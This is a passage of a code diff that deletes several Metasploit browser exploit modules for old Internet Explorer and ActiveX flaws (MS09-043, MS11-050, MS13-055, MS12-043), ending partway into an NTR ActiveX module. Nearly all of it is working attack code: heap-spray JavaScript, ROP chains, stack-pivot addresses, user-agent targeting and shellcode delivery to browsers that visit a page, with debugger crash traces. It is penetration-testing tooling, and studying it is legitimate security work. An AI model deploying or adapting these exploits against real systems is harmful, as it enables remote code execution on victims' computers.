020bc708 633a9c0b jscript!VAR::InvokeByDispID+0xce
020bc8a4 633a5ab0 jscript!CScriptRuntime::Run+0x2989
=end

131
modules/exploits/windows/browser/ms09_043_owc_msdso.rb
View File

@ -1,131 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption',
'Description' => %q{
This module exploits a memory corruption vulnerability within versions 10 and 11 of
the Office Web Component Spreadsheet ActiveX control. This module was based on
an exploit found in the wild.
},
'License' => MSF_LICENSE,
'Author' => [ 'unknown', 'hdm', 'Ahmed Obied', 'DSR! <xchwarze[at]gmail.com>' ],
'References' =>
[
[ 'CVE', '2009-1136' ],
[ 'OSVDB', '55806' ],
[ 'MSB', 'MS09-043' ],
[ 'URL', 'http://ahmed.obied.net/software/code/exploits/ie_owc.py' ],
[ 'EDB', '9163' ],
# broken: [ 'URL', 'http://xeye.us/blog/2009/07/one-0day/' ],
[ 'URL', 'http://www.microsoft.com/technet/security/advisory/973472.mspx' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => '',
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ] # other exploits use 0x0b0c0b0c
],
'DisclosureDate' => 'Jul 13 2009',
'DefaultTarget' => 0))
@javascript_encode_key = rand_text_alpha(rand(10) + 10)
end
def on_request_uri(cli, request)
# Send a redirect with the javascript encoding key
#if (!request.uri.match(/\?\w+/))
# send_local_redirect(cli, "?#{@javascript_encode_key}")
# return
#end
return if ((p = regenerate_payload(cli)) == nil)
print_status("Sending #{self.name}")
shellcode = Rex::Text.to_unescape(p.encoded)
retaddr = Rex::Text.to_unescape([target.ret].pack('V'))
js = %Q|
var xshellcode = unescape("#{shellcode}");
var xarray = new Array();
var xls = 0x81000-(xshellcode.length*2);
var xbigblock = unescape("#{retaddr}");
while( xbigblock.length < xls / 2) { xbigblock += xbigblock; }
var xlh = xbigblock.substring(0, xls / 2);
delete xbigblock;
for(xi=0; xi<0x99*2; xi++) {
xarray[xi] = xlh + xlh + xshellcode;
}
CollectGarbage();
var xobj;
try {
xobj = new ActiveXObject("OWC10.Spreadsheet");
} catch(err) {
try {
xobj = new ActiveXObject("OWC11.Spreadsheet");
} catch(err) {
}
}
xe = new Array();
xe.push(1);
xe.push(2);
xe.push(0);
xe.push(window);
for(xi=0; xi < xe.length; xi++){
for(xj=0; xj<10; xj++){
try { xobj.Evaluate(xe[xi]); } catch(e) { }
}
}
window.status = xe[3] + '';
for(xj=0; xj<10; xj++){
try{ xobj.msDataSourceObject(xe[3]); } catch(e) { }
}
|
# Obfuscate it up a bit
js = obfuscate_js(js,
'Symbols' => {
'Variables' => %W{ xshellcode xarray xls xbigblock xlh xi xobj xe xj err}
}
).to_s
# Encode the javascript payload with the URI key
# js = encrypt_js(js, @javascript_encode_key)
# Fire off the page to the client
send_response(cli, "<html><script language='javascript'>#{js}</script></html>")
# Handle the payload
handler(cli)
end
end

284
modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
View File

@ -1,284 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
#include Msf::Exploit::Remote::BrowserAutopwn
#autopwn_info({
# :ua_name => HttpClients::IE,
# :ua_minver => "7.0",
# :ua_maxver => "8.0",
# :javascript => true,
# :os_name => OperatingSystems::Match::WINDOWS
#})
def initialize(info={})
super(update_info(info,
'Name' => "MS11-050 IE mshtml!CObjectElement Use After Free",
'Description' => %q{
This module exploits a use-after-free vulnerability in Internet Explorer. The
vulnerability occurs when an invalid <object> tag exists and other elements
overlap/cover where the object tag should be when rendered (due to their
styles/positioning). The mshtml!CObjectElement is then freed from memory because
it is invalid. However, the mshtml!CDisplay object for the page continues to keep
a reference to the freed <object> and attempts to call a function on it, leading
to the use-after-free.
Please note that for IE 8 targets, JRE (Java Runtime Environment) is required
to bypass DEP (Data Execution Prevention).
},
'License' => MSF_LICENSE,
'Author' =>
[
'd0c_s4vage', #Discovery, poc
'sinn3r', #ROP (thx corelanc0d3r), Windows 7
'bannedit' #Windows 7
],
'References' =>
[
['CVE', '2011-1260'],
['OSVDB', '72950'],
['MSB', 'MS11-050'],
['URL', 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x09\x0a\x0d'\\",
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ],
# In IE6 the mshtml!CObjectElement size is 0xac
[
'Internet Explorer 7 on XP SP3',
{
'Rop' => false,
'Ret' => nil, #Not required for non-ROP targets
'TargetAddr' => 0x0c0c0c0c, #For vtable
'ObjSize' => '0xB0', #mshtml!CObjectElement size
'Offset' => '0x01',
}
],
[
'Internet Explorer 7 on Windows Vista',
{
'Rop' => false,
'Ret' => nil, #Not required for non-ROP targets
'TargetAddr' => 0x0c0c0c0c, #For vtable
'ObjSize' => '0xB0', #mshtml!CObjectElement size
'Offset' => '0x01',
}
],
[
'Internet Explorer 8 on XP SP3',
{
'Rop' => true,
'Ret' => 0x7C348B05, #Stack pivot (xchg eax,esp; retn from java)
'TargetAddr' => 0x0c0c0c0c, #For vtable
'ObjSize' => '0xE0', #mshtml!CObjectElement size
'Offset' => '0x5E2',
}
],
[
'Internet Explorer 8 on Windows 7',
{
'Rop' => true,
'Ret' => 0x7C348B05, #Stack pivot (xchg eax,esp; retn from java)
'TargetAddr' => 0x0c0c0c0c, #For vtable
'ObjSize' => '0xE0', #mshtml!CObjectElement size
'Offset' => '0x5F4',
}
],
[ 'Debug Target (Crash)', {} ],
],
'DisclosureDate' => "Jun 16 2011",
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
])
end
def auto_target(cli, request)
agent = request.headers['User-Agent']
if agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
#Windows XP + IE7
mytarget = targets[1]
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.0/
#Windows Vista + IE7
mytarget = targets[2]
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
#Windows XP + IE8
mytarget = targets[3]
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/
#Windows 7 + IE8
mytarget = targets[4]
else
mytarget = nil
end
return mytarget
end
def on_request_uri(cli, request)
#Set default target
mytarget = target
debug = false
if target.name == 'Automatic'
mytarget = auto_target(cli, request)
if mytarget.nil?
agent = request.headers['User-Agent']
print_error("Unknown User-Agent #{agent}")
send_not_found(cli)
return
end
elsif target.name =~ /Debug/
debug = true
end
if debug
data = <<-DATA
<html>
<body>
<script language='javascript'>
document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>TAG_1</object>";
document.body.innerHTML += "<a id='tag_3' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";
document.body.innerHTML += "AAAAAAA";
document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";
</script>
</body>
</html>
DATA
print_status("Triggering vulnerability (target: #{mytarget.name})...")
send_response(cli, data, { 'Content-Type' => 'text/html' })
return
end
if mytarget['Rop']
p = make_nops(44) #Nops
p << "\xeb\x04\xff\xff" #Jmp over the pivot
p << [mytarget.ret].pack('V') #Stack pivot
p << payload.encoded
rop_payload = generate_rop_payload('java', p)
end
code = (rop_payload) ? rop_payload : payload.encoded
# fill the vtable
vtable = [mytarget['TargetAddr']].pack('V*')
#Convert code format so we can unescape() in JavaScript
code_js = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch))
vtable_js = Rex::Text.to_unescape(vtable, Rex::Arch.endian(target.arch))
randnop = rand_text_alpha(rand(100) + 1)
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
#Extract string based on what the setup is
if mytarget.name == 'Internet Explorer 8 on XP SP3'
js_extract_str = "var block = shellcode.substring(2, 0x20000-0x21);"
elsif mytarget.name == 'Internet Explorer 8 on Windows 7'
js_extract_str = "var block = shellcode.substring(0, (0x7ffc0-6)/2);"
else
js_extract_str = "var block = shellcode.substring(0, (0x40000-6)/2);"
end
js = <<-JS
function timedRefresh(timeoutPeriod) {
setTimeout("location.reload(true);",timeoutPeriod);
}
function enable_lfh(heaplib_obj, obj_size, max) {
var vtable = unescape("#{vtable_js}");
while (vtable.length < obj_size) vtable += vtable;
var obj = vtable.substring(0, (obj_size-6)/2);
for (var i=1; i < max; i++) {
heaplib_obj.alloc(obj);
}
}
function heap_spray(heaplib_obj, offset) {
var code = unescape("#{code_js}");
var #{randnop} = "#{js_nops}";
var nops = unescape(#{randnop});
while (nops.length < 0x1000) nops += nops;
offset = nops.substring(0, #{mytarget['Offset']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
#{js_extract_str}
heaplib_obj.gc();
for (var i2=0; i2 < 0x400-1; i2++) {
heaplib_obj.alloc(block);
}
}
heap = new heapLib.ie(0x20000);
heap_spray(heap, #{mytarget['Offset']});
enable_lfh(heap, #{mytarget['ObjSize']}, 0x200);
document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>TAG_1</object>";
enable_lfh(heap, #{mytarget['ObjSize']}, 0x200);
document.body.innerHTML += "<a id='tag_4' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";
enable_lfh(heap, #{mytarget['ObjSize']}, 0x200);
document.body.innerHTML += "BBBBBBBBBBBBBBBBBBBBBBB";
enable_lfh(heap, #{mytarget['ObjSize']}, 0x500);
document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";
timedRefresh(2000);
JS
js = heaplib(js, {:noobfu => true})
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate(memory_sensitive: true)
end
html = <<-HTML
<html>
<body>
<script language='javascript'>
#{js}
</script>
</body>
</html>
HTML
print_status("Sending exploit (#{mytarget.name})...")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end
=begin
(b00.1ac): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c0c0c ebx=0294b920 ecx=0bb300c8 edx=00000000 esi=020be380 edi=00000000
eip=6363fcc6 esp=020be354 ebp=020be36c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
mshtml!CElement::Doc+0x2:
6363fcc6 8b5070 mov edx,dword ptr [eax+70h] ds:0023:0c0c0c7c=????????
=end

200
modules/exploits/windows/browser/ms13_055_canchor.rb
View File

@ -1,200 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info={})
super(update_info(info,
'Name' => "MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free",
'Description' => %q{
In IE8 standards mode, it's possible to cause a use-after-free condition by first
creating an illogical table tree, where a CPhraseElement comes after CTableRow,
with the final node being a sub table element. When the CPhraseElement's outer
content is reset by using either outerText or outerHTML through an event handler,
this triggers a free of its child element (in this case, a CAnchorElement, but
some other objects apply too), but a reference is still kept in function
SRunPointer::SpanQualifier. This function will then pass on the invalid reference
to the next functions, eventually used in mshtml!CElement::Doc when it's trying to
make a call to the object's SecurityContext virtual function at offset +0x70, which
results a crash. An attacker can take advantage of this by first creating an
CAnchorElement object, let it free, and then replace the freed memory with another
fake object. Successfully doing so may allow arbitrary code execution under the
context of the user.
This bug is specific to Internet Explorer 8 only. It was originally discovered by
Jose Antonio Vazquez Gonzalez and reported to iDefense, but was discovered again
by Orange Tsai at Hitcon 2013.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Jose Antonio Vazquez Gonzalez', # Original discovery reported from iDefense
'Orange Tsai', # Rediscovery, published at Hitcon 2013
'Peter Vreugdenhil', # Joins the party (wtfuzz)
'sinn3r' # Joins the party
],
'References' =>
[
[ 'CVE', '2013-3163' ],
[ 'OSVDB', '94981' ],
[ 'MSB', 'MS13-055' ],
[ 'URL', 'https://speakerd.s3.amazonaws.com/presentations/0df98910d26c0130e8927e81ab71b214/for-share.pdf' ]
],
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
[
'IE 8 on Windows XP SP3',
{
'Rop' => :msvcrt,
'Pivot' => 0x77c15ed5, # xchg eax, esp; ret
'Align' => 0x77c4d801 # add esp, 0x2c; ret
}
],
[
'IE 8 on Windows 7',
{
'Rop' => :jre,
'Pivot' => 0x7c348b05, # xchg eax, esp; ret
'Align' => 0x7C3445F8 # add esp, 0x2c; ret
}
]
],
'Payload' =>
{
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Privileged' => false,
# Bug was patched in July 2013. Tsai was the first to publish the bug.
# But Jose already reported way back in Oct 2012 (to iDefense)
'DisclosureDate' => "Jul 09 2013",
'DefaultTarget' => 0))
end
def get_target(agent)
return target if target.name != 'Automatic'
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
ie_name = "IE #{ie}"
case nt
when '5.1'
os_name = 'Windows XP SP3'
when '6.1'
os_name = 'Windows 7'
end
targets.each do |t|
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
return t
end
end
nil
end
def get_payload(t)
if t['Rop'] == :msvcrt
print_status("Using msvcrt ROP")
esp_align = "\x81\xc4\x54\xf2\xff\xff"
rop_dll = 'msvcrt'
opts = {'target'=>'xp'}
else
print_status("Using JRE ROP")
esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
rop_dll = 'java'
opts = {}
end
p = esp_align + payload.encoded + rand_text_alpha(12000)
generate_rop_payload(rop_dll, p, opts)
end
def get_html(t, p)
junk = rand_text_alpha(4).unpack("V")[0].to_i
js_pivot = Rex::Text.to_unescape([t['Pivot']].pack("V*"))
js_payload = Rex::Text.to_unescape(p)
js_align = Rex::Text.to_unescape([t['Align']].pack("V*"))
js_junk = Rex::Text.to_unescape([junk].pack("V*"))
q_id = Rex::Text.rand_text_alpha(1)
%Q|
<!DOCTYPE html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<head>
<meta>
<?IMPORT namespace="t" implementation="#default#time2">
</meta>
</head>
<script>
#{js_mstime_malloc}
window.onload = function() {
var x = document.getElementById("#{q_id}");
x.outerText = "";
a = document.getElementById('myanim');
p = '';
for (i=0; i < 7; i++) {
p += unescape("#{js_junk}");
}
p += unescape("#{js_payload}");
fo = unescape("#{js_align}");
for (i=0; i < 28; i++) {
if (i == 27) { fo += unescape("#{js_pivot}"); }
else { fo += unescape("#{js_align}"); }
}
fo += p;
mstime_malloc({shellcode:fo, heapBlockSize:0x68, objId:"myanim"});
}
</script>
<table>
<tr>
<div>
<span>
<q id='#{q_id}'>
<a>
<td></td>
</a>
</q>
</span>
</div>
</tr>
</table>
<t:ANIMATECOLOR id="myanim"/>
</html>
|
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
t = get_target(agent)
if t
p = get_payload(t)
html = get_html(t, p)
print_status("Sending exploit...")
send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
else
print_error("Not a suitable target: #{agent}")
send_not_found(cli)
end
end
end

427
modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
View File

@ -1,427 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "6.0",
:ua_maxver => "9.0",
:javascript => true,
:os_name => OperatingSystems::Match::WINDOWS,
:classid => "{f6D90f11-9c73-11d3-b32e-00C04f990bb4}",
:method => "definition",
:rank => GoodRanking
})
def initialize(info={})
super(update_info(info,
'Name' => "MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption",
'Description' => %q{
This module exploits a memory corruption flaw in Microsoft XML Core Services
when trying to access an uninitialized Node with the getDefinition API, which
may corrupt memory allowing remote code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'inking26', # Reliable exploitation
'binjo', # Metasploit module
'sinn3r', # Metasploit module
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2012-1889' ],
[ 'BID', '53934' ],
[ 'OSVDB', '82873'],
[ 'MSB', 'MS12-043'],
[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2719615' ],
[ 'URL', 'http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462' ],
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities' ]
],
'Payload' =>
{
'BadChars' => "\x00",
'Space' => 1024
},
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>
[
# msxml3.dll 8.90.1101.0
[ 'Automatic', {} ],
[
'IE 6 on Windows XP SP3',
{
'Offset' => '0x100',
'Rop' => nil,
'RandomHeap' => false
}
],
[
'IE 7 on Windows XP SP3 / Vista SP2',
{
'Offset' => '0x100',
'Rop' => nil,
'RandomHeap' => false
}
],
[
'IE 8 on Windows XP SP3',
{
'Rop' => :msvcrt,
'RandomHeap' => false,
'RopChainOffset' => '0x5f4',
'Offset' => '0x0',
'StackPivot' => 0x77c15ed5, # xchg eax, esp # ret # from msvcrt.dll
}
],
[
'IE 8 with Java 6 on Windows XP SP3',
{
'Rop' => :jre,
'RandomHeap' => false,
'RopChainOffset' => '0x5f4',
'Offset' => '0x0',
'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll
}
],
[
'IE 8 with Java 6 on Windows 7 SP1/Vista SP2',
{
'Rop' => :jre,
'RandomHeap' => false,
'RopChainOffset' => '0x5f4',
'Offset' => '0x0',
'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll
}
],
[
'IE 9 with Java 6 on Windows 7 SP1',
{
'Rop' => :jre,
'RandomHeap' => true,
'RopChainOffset' => 0x5FC,
'Offset' => '0x0',
'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll
}
]
],
'Privileged' => false,
'DisclosureDate' => "Jun 12 2012",
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
])
end
def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
return targets[1] #IE 6 on Windows XP SP3
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
return targets[2] #IE 7 on Windows XP SP3
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
return targets[2] #IE 7 on Windows Vista SP2
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
return targets[3] #IE 8 on Windows XP SP3
elsif agent =~ /NT 6\.[01]/ and agent =~ /MSIE 8/
return targets[5] #IE 8 on Windows 7 SP1/Vista SP2
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/
return targets[6] #IE 9 on Windows 7 SP1
else
return nil
end
end
def ret(t)
case t['Rop']
when :msvcrt
return [ 0x77c4ec01 ].pack("V") # RETN (ROP NOP) # msvcrt.dll
when :jre
return [ 0x7c347f98 ].pack("V") # RETN (ROP NOP) # msvcr71.dll
end
end
def popret(t)
case t['Rop']
when :msvcrt
return [ 0x77c4ec00 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcrt.dll
when :jre
return [ 0x7c376541 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcr71.dll
end
end
def get_rop_chain(t)
if t['RandomHeap']
adjust = [ 0x0c0c0c0c ].pack("V") # heap isn't filled with pointers to 0x0c0c0c0c
adjust << ret(t)
else
adjust = ret(t)
end
adjust << popret(t)
adjust << [ t['StackPivot'] ].pack("V")
adjust << ret(t) * 4 # first call to a "ret" because there is a good gadget in the stack :)
# Both ROP chains generated by mona.py - See corelan.be
case t['Rop']
when :msvcrt
print_status("Using msvcrt ROP")
rop = generate_rop_payload('msvcrt','',{'target'=>'xp', 'pivot'=>adjust})
else
print_status("Using JRE ROP")
rop = generate_rop_payload('java','',{'pivot'=>adjust})
end
return rop
end
def get_easy_spray(t, js_code, js_nops)
randnop = rand_text_alpha(rand(100) + 1)
spray = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var #{randnop} = "#{js_nops}";
var nops = unescape(#{randnop});
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, #{t['Offset']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var z=1; z < 0x230; z++) {
heap_obj.alloc(block);
}
JS
return spray
end
def get_aligned_spray(t, js_rop, js_code, js_nops, js_90_nops)
randnop = rand_text_alpha(rand(100) + 1)
randnop2 = rand_text_alpha(rand(100) + 1)
spray = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var #{randnop} = "#{js_nops}";
var nops = unescape(#{randnop});
var #{randnop2} = "#{js_90_nops}";
var nops_90 = unescape(#{randnop2});
var rop_chain = unescape("#{js_rop}");
while (nops.length < 0x80000) nops += nops;
while (nops_90.length < 0x80000) nops_90 += nops_90;
var offset = nops.substring(0, #{t['Offset']});
var nops_padding = nops.substring(0, #{t['RopChainOffset']}-code.length-offset.length);
var shellcode = offset + code + nops_padding + rop_chain + nops_90.substring(0, 0x800-code.length-nops_padding.length-rop_chain.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var z=1; z < 0x230; z++) {
heap_obj.alloc(block);
}
JS
return spray
end
# Spray published by corelanc0d3r
# Exploit writing tutorial part 11 : Heap Spraying Demystified
# See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
def get_random_spray(t, js_rop, js_code, js_90_nops)
spray = <<-JS
function randomblock(blocksize)
{
var theblock = "";
for (var i = 0; i < blocksize; i++)
{
theblock += Math.floor(Math.random()*90)+10;
}
return theblock;
}
function tounescape(block)
{
var blocklen = block.length;
var unescapestr = "";
for (var i = 0; i < blocklen-1; i=i+4)
{
unescapestr += "%u" + block.substring(i,i+4);
}
return unescapestr;
}
var heap_obj = new heapLib.ie(0x10000);
var rop = unescape("#{js_rop}");
var code = unescape("#{js_code}");
var #{randnop2} = "#{js_90_nops}";
var nops_90 = unescape(#{randnop2});
while (nops_90.length < 0x80000) nops_90 += nops_90;
var offset_length = #{t['RopChainOffset']};
for (var i=0; i < 0x1000; i++) {
var padding = unescape(tounescape(randomblock(0x1000)));
while (padding.length < 0x1000) padding+= padding;
var junk_offset = padding.substring(0, offset_length - code.length);
var single_sprayblock = code + junk_offset + rop + nops_90.substring(0, 0x800 - code.length - junk_offset.length - rop.length);
while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;
sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);
heap_obj.alloc(sprayblock);
}
JS
return spray
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
my_target = get_target(agent)
# Avoid the attack if the victim doesn't have the same setup we're targeting
if my_target.nil?
print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}")
send_not_found(cli)
return
end
p = payload.encoded
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
js_90_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
if not my_target['Rop'].nil?
js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))
end
if my_target['RandomHeap']
js = get_random_spray(my_target, js_rop, js_code, js_90_nops)
elsif not my_target['Rop'].nil?
js = get_aligned_spray(my_target, js_rop, js_code, js_nops, js_90_nops)
else
js = get_easy_spray(my_target, js_code, js_nops)
end
js = heaplib(js, {:noobfu => true})
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate(memory_sensitive: true)
end
object_id = rand_text_alpha(4)
html = <<-EOS
<html>
<head>
<script>
#{js}
</script>
</head>
<body>
<object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id="#{object_id}"></object>
<script>
var obj = document.getElementById('#{object_id}').object;
var src = unescape("%u0c08%u0c0c");
while (src.length < 0x1002) src += src;
src = "\\\\\\\\xxx" + src;
src = src.substr(0, 0x1000 - 10);
var pic = document.createElement("img");
pic.src = src;
pic.nameProp;
obj.definition(#{rand(999) + 1});
</script>
</body>
</html>
EOS
html = html.gsub(/^ {4}/, '')
print_status("#{cli.peerhost}:#{cli.peerport} - Sending html")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end
=begin
(e34.358): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=7498670c ebx=00000000 ecx=5f5ec68b edx=00000001 esi=7498670c edi=0013e350
eip=749bd772 esp=0013e010 ebp=0013e14c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
msxml3!_dispatchImpl::InvokeHelper+0xb4:
749bd772 ff5118 call dword ptr [ecx+18h] ds:0023:5f5ec6a3=????????
0:008> r
eax=020bf2f0 ebx=00000000 ecx=00000000 edx=00000001 esi=020bf2f0 edi=020bf528
eip=749bd772 esp=020bf1a8 ebp=020bf2e4 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
msxml3!_dispatchImpl::InvokeHelper+0xb4:
749bd772 ff5118 call dword ptr [ecx+18h] ds:0023:00000018=????????
0:008> k
ChildEBP RetAddr
020bf2e4 749bdb13 msxml3!_dispatchImpl::InvokeHelper+0xb4
020bf320 749d4d84 msxml3!_dispatchImpl::Invoke+0x5e
020bf360 749dcae4 msxml3!DOMNode::Invoke+0xaa
020bf394 749bd5aa msxml3!DOMDocumentWrapper::Invoke+0x50
020bf3f0 749d6e6c msxml3!_dispatchImpl::InvokeEx+0xfa
020bf420 633a6d37 msxml3!_dispatchEx<IXMLDOMNode,&LIBID_MSXML2,&IID_IXMLDOMNode,0>::InvokeEx+0x2d
020bf460 633a6c75 jscript!IDispatchExInvokeEx2+0xf8
020bf49c 633a9cfe jscript!IDispatchExInvokeEx+0x6a
020bf55c 633a9f3c jscript!InvokeDispatchEx+0x98
020bf590 633a77ff jscript!VAR::InvokeByName+0x135
020bf5dc 633a85c7 jscript!VAR::InvokeDispName+0x7a
020bf60c 633a9c0b jscript!VAR::InvokeByDispID+0xce
020bf7a8 633a5ab0 jscript!CScriptRuntime::Run+0x2989
020bf890 633a59f7 jscript!ScrFncObj::CallWithFrameOnStack+0xff
020bf8dc 633a5743 jscript!ScrFncObj::Call+0x8f
020bf958 633891f1 jscript!CSession::Execute+0x175
020bf9a4 63388f65 jscript!COleScript::ExecutePendingScripts+0x1c0
020bfa08 63388d7f jscript!COleScript::ParseScriptTextCore+0x29a
020bfa30 635bf025 jscript!COleScript::ParseScriptText+0x30
020bfa88 635be7ca mshtml!CScriptCollection::ParseScriptText+0x219
=end

200
modules/exploits/windows/browser/ntr_activex_stopmodule.rb
View File

@ -1,200 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
#include Msf::Exploit::Remote::BrowserAutopwn
#
#autopwn_info({
# :ua_name => HttpClients::IE,
# :ua_minver => "6.0",
# :ua_maxver => "7.0",
# :javascript => true,
# :os_name => OperatingSystems::Match::WINDOWS,
# :classid => "{E6ACF817-0A85-4EBE-9F0A-096C6488CFEA}",
# :method => "StopModule",
# :rank => NormalRanking
#})
def initialize(info = {})
super(update_info(info,
'Name' => 'NTR ActiveX Control StopModule() Remote Code Execution',
'Description' => %q{
This module exploits a vulnerability found in the NTR ActiveX 1.1.8. The
vulnerability exists in the StopModule() method, where the lModule parameter is
used to dereference memory to get a function pointer, which leads to code execution
under the context of the user visiting a malicious web page.
},
'Author' =>
[
'Carsten Eiram', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
